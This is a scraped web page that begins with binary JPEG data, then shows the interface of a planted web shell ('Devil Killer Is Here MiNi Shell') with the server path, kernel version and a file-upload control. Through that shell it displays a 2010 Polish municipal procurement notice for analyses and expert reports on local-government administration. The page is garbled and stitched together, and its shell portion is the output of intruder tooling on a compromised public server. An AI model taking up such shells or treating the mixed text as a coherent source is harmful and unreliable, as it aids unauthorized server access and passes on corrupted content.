JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/103866-N-2010.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Wykonanie analiz, badań i ekspertyz objętych zadaniami 3, 4, 6 projektu Sprawny Samorząd. Wdrażanie usprawnień w zarządzaniu jednostką samorządu terytorialnego w 10 urzędach gmin i 2 starostwach powiatowych z terenu województwa opolskiego i śląskiego</b><br>
<b>Numer ogłoszenia: 103866 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn-Koźle , ul. Planetorza 2, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 0-77 4052603, faks 0-77 4052603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie analiz, badań i ekspertyz objętych zadaniami 3, 4, 6 projektu Sprawny Samorząd. Wdrażanie usprawnień w zarządzaniu jednostką samorządu terytorialnego w 10 urzędach gmin i 2 starostwach powiatowych z terenu województwa opolskiego i śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 3 Projektu
I. 	Analiza i synteza normatywnych, organizacyjnych oraz informatycznych wymagań wobec procesu komunikacji wewnętrznej w 12 urzędach beneficjentów
1. Dokonanie analizy normatywnych zadań i obowiązków beneficjentów oraz innych wymagań w zakresie komunikacji wewnętrznej w 12 urzędach beneficjentów, określonych w
1)	powszechnie obowiązujących lub znajdujących się w toku procedury prawodawczej aktach normatywnych (ustawach i rozporządzeniach wykonawczych, projektach ustaw co najmniej złożonych w Sejmie oraz projektach rozporządzeń, co najmniej skierowanych do uzgodnień międzyresortowych)
2)	obowiązujących u wszystkich 12 beneficjentów aktach prawa miejscowego (zgodnie z wykazem dostarczonym przez Zamawiającego)
3)	obowiązujących u wszystkich 12 beneficjentów aktach kierownictwa wewnętrznego - uchwałach nie mających statusu aktu prawa miejscowego, zarządzeniach, regulaminach, instrukcjach regulujących bezpośrednio lub pośrednio zasady komunikacji wewnętrznej (zgodnie z wykazem dostarczonym przez Zamawiającego)
4)	Polskich Normach oraz innych dokumentach normalizacyjnych w rozumieniu przepisów o normalizacji, regulujących systemy zarządzania jakością stosowane w urzędach administracji publicznej, w tym w urzędach beneficjentów
2. Dokonanie syntezy danych zgromadzonych w wyniku analizy przeprowadzonej zgodnie z ust. 1 i 2 oraz sformułowanie wniosków końcowych, zwanych wnioskami końcowymi Analizy, zawierających 
1) pełny wykaz normatywnych zadań i obowiązków 
2) pełny wykaz organizacyjnych oraz informatycznych wymagań
3) założenia metodologiczne dotyczące opracowania, standaryzacji i walidacji metod badań 
II. 	Wykonanie badań pt Ocena prawidłowości i efektywności modeli, procedur, metod oraz narzędzi komunikacji wewnętrznej w 12 urzędach beneficjentów
1.	Określenie hipotez badawczych dotyczących prawidłowości oraz efektywności modeli, procedur, metod oraz narzędzi informatycznych komunikacji wewnętrznej stosowanych 
w poszczególnych 12 urzędach beneficjentów przewidzianych do weryfikacji w badaniach, zgodnie z wnioskami końcowymi Analizy
2.	Opracowanie, standaryzacja i walidacja adresowanych do pracowników 12 urzędów beneficjentów zatrudnionych na stanowiskach kierowniczych
1)	Przeprowadzenie przy pomocy kwestionariuszy określonych w ust.2 badań ewaluacyjnych trybie ex-ante. 
3.	Dokonanie metodą SWOT lub inną równoważną techniką analityczną interpretacji wyników badań przeprowadzonych zgodnie z ust. 3 w kontekście przyjętych hipotez badawczych 
i sformułowanie wniosków z przeprowadzonych badań, dotyczących organizacyjnych i informatycznych możliwości oraz ograniczeń związanych z realizacją w poszczególnych 12 urzędach beneficjentów
III.	Wykonanie ekspertyzy pt Optymalne modele, procedury, metody oraz informatyczne narzędzia komunikacji wewnętrznej w 12 urzędach beneficjentów
1.	Opracowanie na podstawie
1)	wniosków końcowych Analizy
2)	wniosków z przeprowadzonych badań prawidłowości i efektywności modeli, procedur, metod oraz narzędzi informatycznych komunikacji wewnętrznej stosowanych w poszczególnych 12 urzędach beneficjentów, opisu optymalnych modeli, procedur, metod oraz informatycznych narzędzi komunikacji wewnętrznej w poszczególnych 12 urzędach beneficjentów, z uwzględnieniem ich rodzaju (starostwo, urząd miasta, urząd gminy) oraz wielkości, z zastrzeżeniem ust.2
2.	Opracowanie opisu przedmiotu i określenie szacunkowej wartości łącznego zamówienia na wdrożenie optymalnych modeli, procedur, metod oraz informatycznych narzędzi komunikacji wewnętrznej we wszystkich 12 urzędach beneficjentów
Zadanie 4 Projektu
I. Wykonanie analizy i syntezy normatywnych, organizacyjnych oraz informatycznych wymagań wobec systemów obiegu dokumentów w urzędach 12 beneficjentów 1. Dokonanie analizy normatywnych zadań i obowiązków beneficjentów oraz innych wymagań w zakresie obiegu, w tym elektronicznego obiegu dokumentów, określonych w 1) powszechnie obowiązujących lub znajdujących się w toku procedury prawodawczej aktach normatywnych (ustawach i rozporządzeniach wykonawczych, projektach ustaw, co najmniej złożonych w Sejmie oraz projektach rozporządzeń, co najmniej skierowanych do uzgodnień międzyresortowych), w szczególności w zakresie informatyzacji działalności podmiotów realizujących zadania publiczne, podpisów elektronicznych, postępowania administracyjnego, postępowania podatkowego, ewidencji ludności, instrukcji kancelaryjnej 2) obowiązujących u wszystkich 12 beneficjentów aktach prawa miejscowego (zgodnie z wykazem dostarczonym przez Zamawiającego) 3) obowiązujących u wszystkich 12 beneficjentów aktach kierownictwa wewnętrznego - uchwałach nie mających statusu aktu prawa miejscowego, zarządzeniach, regulaminach, instrukcjach, regulujących bezpośrednio lub pośrednio a) modele, procedury i metody oraz narzędzia wchodzące w skład systemów obiegu dokumentów tradycyjnych (papierowych) i dokumentów elektronicznych b) struktury obecnie prowadzonej dokumentacji pod kątem jednolitego rzeczowego wykazu akt z uwzględnieniem prawidłowości stosowania symboli klasyfikacyjnych oraz kwalifikacji archiwalnej (przypisanej symbolom klasyfikacyjnym kategorii archiwalnej) akt c) wykaz rejestrów i ewidencji objętych obowiązkiem stosowania w obiegu, w tym elektronicznym obiegu dokumentów d) zasad funkcjonowania biura obsługi interesanta (klienta, mieszkańca ) (zgodnie z wykazem dostarczonym przez Zamawiającego) 4) Polskich Normach oraz innych dokumentach normalizacyjnych w rozumieniu przepisów o normalizacji, regulujących systemy zarządzania jakością stosowane w urzędach administracji publicznej, w tym w urzędach beneficjentów 2. Dokonanie, w oparciu o przegląd 12 urzędów beneficjentów dokonanie analizy organizacyjnych oraz informatycznych wymagań dotyczących sposobu zapewnienia spełniania normatywnych zadań i obowiązków lub rekomendowanych rozwiązań w zakresie systemów obiegu, w tym elektronicznego obiegu dokumentów, w poszczególnych 12 urzędach beneficjentów, obejmujących informatyczne narzędzia w postaci 
- elektronicznej skrzynki podawczej, zapewniającej wydawanie elektronicznego urzędowego poświad?czenia odbioru - elektronicznego biura obsługi intere?Santa - systemu elektronicznego zarządza?nia dokumentami i archiwizowania powiązanego z podmiotową stroną BIP 
3.	Dokonanie syntezy danych zgromadzonych w wyniku analizy przeprowadzonej zgodnie 
z ust. 1 i 2 oraz sformułowanie wniosków, zwanych wnioskami końcowymi Analizy zawierających 1) Pełny wykaz normatywnych zadań i obowiązków w zakresie funkcjonowania systemów obiegu w tym elektronicznego obiegu dokumentów w poszczególnych 12 urzędach beneficjentów 2) Pełny wykaz organizacyjnych i informatycznych wymagań dotyczących zapewnienia realizacji normatywnych zadań i obowiązków lub rekomendowanych rozwiązań w zakresie systemów obiegu, w tym elektronicznego obiegu dokumentów, obejmujących informatyczne narzędzia w postaci -	elektronicznej skrzynki podawczej, zapewniającej wydawanie elektronicznego urzędowego poświad?czenia odbioru -elektronicznego biura obsługi intere?Santa -systemu elektronicznego zarządza?nia dokumentami i archiwizowania powiązanego z podmiotową stroną BIP 3) założenia metodologiczne dotyczące opracowania, standaryzacji i walidacji metod badań prawidłowości i efektywności modeli, procedur, metod oraz narzędzi wchodzących w skład systemów obiegu, w tym elektronicznego obiegu dokumentów, w postaci a) kwestionariusza oceny sprawności obiegu dokumentów - służącego do ustalenia stopnia efektywności oraz zgodności modeli, procedur, metod i narzędzi wchodzących w skład systemów obiegu dokumentów stosowanych w poszczególnych 12 urzędach beneficjentów z normatywnym wykazem zadań i obowiązków lub rekomendowanymi rozwiązaniami w zakresie obiegu, w tym elektronicznego obiegu dokumentów, zawartymi w pkt. 2 b) kwestionariusza skuteczności nadzoru realizacji zadań/usług c) kwestionariusza oceny poziomu wiedzy i umiejętności stosowania przez pracowników zatrudnionych na stanowiskach urzędniczych i pomocniczych optymalnych modeli, procedur, metod oraz narzędzi wchodzących w skład systemu obiegu, w tym elektronicznego obiegu dokumentów w poszczególnych 12 urzędach beneficjentów
II. Wykonanie badań pt Ocena normatywnej prawidłowości i efektywności systemów obiegu dokumentów w 12 urzędach beneficjentów 1.	 Określenie hipotez badawczych dotyczących prawidłowości i efektywności modeli, procedur, metod oraz narzędzi wchodzących w skład systemów obiegu, w tym elektronicznego obiegu dokumentów, stosowanych w poszczególnych 12 urzędach beneficjentów, przewidzianych do weryfikacji w badaniach, zgodnie z wnioskami końcowymi Analizy 2. Opracowanie, standaryzacja i walidacja adresowanych do pracowników 12 urzędów beneficjentów zatrudnionych na stanowiskach kierowniczych 3. Przeprowadzenie przy pomocy kwestionariuszy określonych w ust.2 badań ewaluacyjnych trybie ex-ante 4. Dokonanie metodą SWOT lub inną równoważną techniką analityczną interpretacji wyników badań przeprowadzonych zgodnie z ust. 3, w kontekście przyjętych hipotez badawczych i sformułowanie wniosków z przeprowadzonych badań, dotyczących organizacyjnych i informatycznych możliwości oraz ograniczeń
III. 	Wykonanie ekspertyzy pt Optymalne modele, procedury, metody oraz systemy elektronicznego obiegu dokumentów w urzędach beneficjentów, 
IV 	Wykonanie ekspertyzy Rozwój i doskonalenie modeli istniejących systemów elektronicznego obiegu dokumentów w 7 urzędach beneficjentów. Opracowanie szczegółowego opisu przedmiotu i określenie szacunkowej wartości łącznego zamówienia na wdrożenie udoskonalonych, optymalnych modeli, procedur, metod oraz systemów obiegu dokumentów w urzędach Partnerów nr 2, 4-6, 8 -10, 
Zadanie 6 Projektu
I. 	Analiza i synteza normatywnych, organizacyjnych oraz informatycznych wymagań wobec procesu mierzenia satysfakcji klientów w 12 urzędach beneficjentów
1.	Dokonanie analizy normatywnych zadań i obowiązków beneficjentów oraz innych wymagań w zakresie mierzenia satysfakcji klientów w 12 urzędach beneficjentów, 
2.	Dokonanie analizy organizacyjnych oraz informatycznych wymagań dotyczących sposobu zapewnienia spełniania normatywnych zadań i obowiązków lub rekomendowanych rozwiązań w zakresie mierzenia satysfakcji klientów w poszczególnych 12 urzędach beneficjentów, przy pomocy zamieszczonych na portalach internetowych tych urzędów narzędzi w postaci a) elektronicznych, interaktywnych formularzy - kwestionariuszy ankiet pomiaru satysfakcji klientów - sondaży i konsultacji społecznych b) zewnętrznych komunikatorów głosowych.
3.	Dokonanie syntezy danych zgromadzonych w wyniku analizy przeprowadzonej zgodnie z ust. 1 i 2 oraz sformułowanie wniosków, zwanych wnioskami końcowymi Analizy a) kwestionariusza oceny skuteczności nadzoru realizacji usług b) kwestionariusza oceny poziomu wiedzy i umiejętności stosowania przez pracowników zatrudnionych na stanowiskach urzędniczych i pomocniczych optymalnych modeli, procedur, metod oraz narzędzi mierzenia satysfakcji klientów w poszczególnych 12 urzędach beneficjentów
II. 	Wykonanie badań ocena prawidłowości i efektywności modeli, procedur, metod oraz narzędzi mierzenia satysfakcji klientów w 12 urzędach beneficjentów
1.	Określenie hipotez badawczych dotyczących prawidłowości oraz efektywności modeli, procedur, metod oraz narzędzi informatycznych mierzenia satysfakcji klientów stosowanych w poszczególnych 12 urzędach beneficjentów przewidzianych do weryfikacji w badaniach, zgodnie z wnioskami końcowymi Analizy.
2.	Opracowanie, standaryzacja i walidacja adresowanych do pracowników 12 urzędów beneficjentów zatrudnionych na stanowiskach kierowniczych:
1)	kwestionariusza oceny skuteczności nadzoru realizacji usług 
2)	kwestionariusza oceny poziomu wiedzy i umiejętności 
3.	Opracowanie, standaryzacja i walidacja adresowanej do klientów 12 urzędów beneficjentów ankiety skuteczności określania potrzeb klientów w poszczególnych 12 urzędach beneficjentów.
4.	Przeprowadzenie przy pomocy kwestionariuszy określonych w ust.2 i ankiety określonej w ust.3, badań ewaluacyjnych trybie ex-ante w zakresie
liczby usług, stopnia efektywności oraz zgodności modeli , procedur, metod i narzędzi mierzenia satysfakcji klientów stosowanych w poszczególnych 12 urzędach beneficjentów z normatywnymi zadaniami i obowiązkami lub rekomendowanymi rozwiązaniami w zakresie mierzenia satysfakcji klientów w poszczególnych 12 urzędach beneficjentów zawartych we wnioskach końcowych Analizy, poziomu wiedzy i umiejętności stosowania przez pracowników zatrudnionych na stanowiskach urzędniczych i pomocniczych optymalnych modeli, procedur, metod oraz narzędzi mierzenia satysfakcji klientów w poszczególnych 12 urzędach beneficjentów, efektywności stosowanych w 12 urzędach beneficjentów modeli, procedur, metod oraz narzędzi mierzenia satysfakcji klientów oraz opracowanie zbiorczych wyników tych badań w postaci liczbowej. 
a)	Dokonanie metodą SWOT lub inną równoważną techniką analityczną interpretacji wyników badań przeprowadzonych zgodnie z ust. 4 w kontekście przyjętych hipotez badawczych i sformułowanie wniosków z przeprowadzonych badań, dotyczących organizacyjnych i informatycznych możliwości oraz ograniczeń.
III.	Wykonanie ekspertyzy optymalne modele, procedury, metody oraz informatyczne narzędzia mierzenia satysfakcji klientów w 12 urzędach beneficjentów
1.	Opracowanie na podstawie
1)	wniosków końcowych Analizy,
2)	wniosków z przeprowadzonych badań prawidłowości oraz efektywności modeli, procedur, metod oraz narzędzi informatycznych mierzenia satysfakcji klientów stosowanych w poszczególnych 12 urzędach beneficjentów opisu optymalnych modeli, procedur, metod oraz informatycznych narzędzi mierzenia satysfakcji klientów w poszczególnych 12 urzędach beneficjentów, z uwzględnieniem ich rodzaju (starostwo, urząd miasta, urząd gminy) oraz wielkości z zastrzeżeniem ust.2.
2.	Opis optymalnego modelu, procedur, metod oraz informatycznych narzędzi mierzenia satysfakcji klientów w odniesieniu do każdego z 12 urzędów beneficjentów winien zawierać minimum 
1)	wykaz procedur, wykaz i opis czynności wchodzących w skład każdej z procedur ze wskazaniem jednostek organizacyjnych i stanowisk uczestniczących w jej realizacji w schemacie work-flow, wykaz wyposażenia technicznego (sprzętu, oprogramowania, oraz innych materiałów - np. druków wniosków) poszczególnych jednostek organizacyjnych i stanowisk, niezbędnego do właściwego wdrożenia i funkcjonowania optymalnego modelu mierzenia satysfakcji klientów, schemat ideowy i opis poszczególnych funkcji oraz projekty zawartości treściowej informatycznych narzędzi zamieszczanych na portalach internetowych tych urzędów narzędzi w postaci 
a) elektronicznych, interaktywnych formularzy - kwestionariuszy ankiet pomiaru satysfakcji klientów - sondaży i konsultacji społecznych b) zewnętrznych komunikatorów głosowych
3.	Określenie szczegółowego opisu przedmiotu i szacunkowej wartości łącznego zamówienia na wdrożenie optymalnych modeli, procedur, metod oraz informatycznych narzędzi mierzenia satysfakcji klientów we wszystkich 12 urzędach beneficjentów, 
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA Z UWAGI NA OGRANICZONE POLE TEKSTOWE NINIEJSZEGO OKNA ZNAJDUJE SIĘ WE WNIOSKU O DOPUSZCZENIE DO POSTĘPOWANIA STANOWIĄCEGO ZAŁĄCZNIK NINIEJSZEGO OGŁOSZENIE I ZAMIESZCZONY NA STRONIE ZAMAWIAJĄCEGO www.kedzierzynkozle.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie (w przypadku usług i świadczeń okresowych lub ciągłych również wykonywane) w okresie ostatnich 3 lat przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie-trzech (3) usług w zakresie opracowania analizy, przeprowadzania badania lub sporządzania ekspertyzy, obejmujących problematykę:
komunikacji wewnętrznej w strukturze jednostek urzędów administracji publicznej,
lub obiegu, w tym elektronicznego obiegu dokumentów w urzędach administracji publicznej, lub mierzenia satysfakcji (zadowolenia) klientów (interesantów) urzędów administracji publicznej, o łącznej wartości, co najmniej 150 000 zł brutto (sto pięćdziesiąt tysięcy złotych brutto), z potwierdzeniem ich należytego wykonania.
W przypadku wniosków wspólnych, doświadczenie podlega sumowaniu.
Zamawiający będzie oceniał spełnienie powyższego warunku na podstawie złożonych dokumentów potwierdzających jego spełnienie  (określonych w poz. 1  wykazu  wymaganych dokumentów) oraz na podstawie przyjętej punktacji tj. 45 pkt. bazowych plus 5 pkt. dodatkowych za każdą kolejną usługę powyżej  trzech (3) w podanym okresie. Wykonawca może otrzymać maksymalnie 10 pkt. dodatkowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie, co najmniej:
a)	jednym specjalistą z zakresu prawa materialnego oraz przepisów proceduralnych regulujących funkcjonowanie jednostek samorządu terytorialnego - posiadającym wykształcenie wyższe prawnicze i co najmniej trzyletnie doświadczenie w: 
świadczeniu pomocy prawnej na rzecz jednostek samorządu terytorialnego, lub 
pracy naukowo-badawczej na uczelni wyższej, związanej z analizą prawnych uwarunkowań procesów zarządzania gminą, lub pracy w organach nadzoru nad działalnością jednostek samorządu terytorialnego, organach kontroli państwowej lub sądownictwie administracyjnym;
b) jednym specjalistą z zakresu metodologii badań ankietowych - posiadającym wykształcenie wyższe w zakresie socjologii lub nauk społecznych lub organizacji i zarządzania oraz co najmniej trzyletnie doświadczenie w:
programowaniu i przeprowadzaniu badań ankietowych na rzecz uczelni wyższej, w ramach stosunku pracy lub prowadzonej działalności gospodarczej;
c)	jednym specjalistą z zakresu informatyki lub teleinformatyki oraz gromadzenia, przechowywania i archiwizowania dokumentów (w tym dokumentów elektronicznych) - posiadającym wykształcenie wyższe i co najmniej trzyletnie doświadczenie w:
obsłudze procesu tworzenia, transferu, gromadzenia, przechowywania i archiwizowania dokumentów (w tym dokumentów elektronicznych) w urzędzie gminy lub starostwie powiatowym, w ramach stosunku pracy lub prowadzonej działalności gospodarczej. 
Zamawiający będzie oceniał spełnienie powyższego warunku na podstawie złożonych dokumentów (określonych w poz. 7 wykazu dokumentów) potwierdzających jego spełnienie oraz na podstawie przyjętej punktacji tj. 45 pkt. bazowych plus 5 pkt. dodatkowych za każdego dodatkowego specjalistę powyżej 3-ech. Wykonawca może otrzymać maksymalnie 10 pkt. dodatkowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie środków finansowych w wysokości, co najmniej 100 000,00- zł lub posiadanie zdolności kredytowej do zaciągnięcia kredytu w tej wysokości lub w wysokości uzupełniającej środki posiadane na koncie do wymaganej kwoty.
W przypadku wykonawców występujących wspólnie, posiadane środki przez poszczególnych wykonawców podlegają sumowaniu. Dopuszczone jest również sumowanie kwoty posiadanej na koncie przez jednego wykonawcę z możliwością zaciągnięcia kredytu uzupełniającego do kwoty wymaganej przez drugiego wykonawcę.
Jeżeli Wykonawca korzysta z zasobów innego podmiotu dopuszcza się również sumowanie środków Wykonawcy ze środkami podmiotu udostępniającego swoje zasoby.
Warunkiem koniecznym jest, aby suma środków poszczególnych wykonawców wynosiła minimum 100 % wymaganych środków określonych w warunkach SIWZ.
Zamawiający będzie oceniał spełnienie powyższego warunku na podstawie złożonych dokumentów (określonych w poz. 2  wykazu dokumentów)potwierdzających jego spełnienie oraz na podstawie przyjętej punktacji tj. 10 pkt. bazowych + 5 pkt. dodatkowych za każde kolejne 50 tys. zł posiadanych środków powyżej 100 000,- zł. Wykonawca może otrzymać maksymalnie 
10 pkt. dodatkowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
